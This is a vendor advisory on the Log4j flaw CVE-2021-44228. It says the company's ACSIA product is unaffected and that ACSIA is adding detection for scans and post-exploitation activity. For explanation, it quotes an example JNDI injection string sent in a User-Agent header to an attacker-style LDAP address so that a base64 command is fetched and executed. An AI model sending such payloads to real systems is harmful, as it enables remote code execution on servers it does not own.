Skip to content

Log4j Vulnerability – Dectar Update

Log4j Vulnerability – Dectar Update

We would like to inform all of our partners and customers that ACSIA is not affected by the vulnerability Log4J better described in CVE-2021-44228

The Elasticsearch component used by the ACSIA stack is the only impacted component within ACSIA, however, as all of our users can see, we do not expose Elasticsearch outside. It is only used within the stack’s internal private communication. We are about to release the patch for this, even though the risk level is extremely low.

Declared as one of the most critical and deadly security vulnerabilities of the year 2021, Log4j  was disclosed on 9 December 2021 and is affecting millions of systems around the globe. This vulnerability fix will cause billions of dollars of financial losses.  A comprehensive and updated lists of affected environments can be found here: https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

The Cybersecurity and Infrastructure Security Agency(USA) has created a similar list here: https://github.com/cisagov/log4j-affected-db

Dectar through our flagship ACSIA product is implementing a specific detection mechanism for log4j vulnerability. 

ACSIA will be able to detect whenever a scanning operation is performed aiming to ascertain if the monitored client is vulnerable or not to log4j. It will also detect post exploitation activities.

In the meantime, we want to do our part to inform our customers about this issue by providing some details.

Log4j is a popular java library used for logging, maintained by Apache Software Foundation, currently used by hundreds of widely used products and platforms. This includes Apache’s Struts2, Solr, Druido and so on.

As widely announced, the exploitation phase is performed by modifying User-Agent value in ${jndi:ldap://12.13.14.15:10553/Basic/Command/Base64/[payload_in_base64}. Once the instructions received by the vulnerable log4j class, [payload_in_base64] will be decoded and executed on the targeted system.

It is an RCE – Remote Code Execution, vulnerability, so the impact is critical. CVSS scored this vulnerability to it’s highest score which is 10/10 and only a few hours after it’s disclosure the scanners were widely detected in trying to exploit the vulnerability all over the internet.

For any further information or questions, please do not hesitate to contact our support team.

© Dectar 2024 Registration Nº: 598914 VAT Nº: 3463752OH